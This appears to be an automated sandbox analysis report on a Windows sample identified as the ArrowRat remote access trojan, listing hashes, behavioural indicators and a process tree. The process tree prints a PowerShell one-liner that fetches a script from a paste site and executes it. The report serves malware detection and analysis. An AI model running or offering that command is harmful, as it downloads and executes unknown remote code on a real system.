arrowrat | 2475c46eba856424c41cf41db71fd5d6089e8be9031b35279f051da760aa216f

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15-07-2024 05:50

Target

9Ood5SWkbwPn.exe
Size

138KB
MD5

2cf2efcc0e1d910d2d9c933ca73055d0
SHA1

3bb08f4532f80bf0cd5a36f26393ba00beadb8eb
SHA256

2475c46eba856424c41cf41db71fd5d6089e8be9031b35279f051da760aa216f
SHA512

e16ca929bf2c7654251b02946fa7954f89971a27750e05c502acede063a55d88df16fb297c40c7bf54e04ea173cb6c3527e65ca98ad2280543e00e9ef6fa9390
SSDEEP

3072:ubvh/X2z7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/Yi:ubvhPi7BqjjYHdrqkL/

Score

10^/10

Family

arrowrat

Botnet

identifier

IP:PORT

Mutex

mutex

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2744	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 2416 wrote to memory of 2744	2416	cmd.exe	33
PID 2416 wrote to memory of 2744	2416	cmd.exe	33
PID 2416 wrote to memory of 2744	2416	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\9Ood5SWkbwPn.exe
"C:\Users\Admin\AppData\Local\Temp\9Ood5SWkbwPn.exe"
1⤵
PID:2552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell "irm rentry.co/Fr3on5000/raw | iex"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744

memory/2552-0-0x000007FEF5993000-0x000007FEF5994000-memory.dmp

Filesize
4KB

Download
memory/2552-1-0x00000000002F0000-0x0000000000318000-memory.dmp

Filesize
160KB

Download
memory/2744-6-0x000007FEF514E000-0x000007FEF514F000-memory.dmp

Filesize
4KB

Download
memory/2744-7-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/2744-9-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-10-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-11-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-12-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-8-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/2744-13-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-14-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download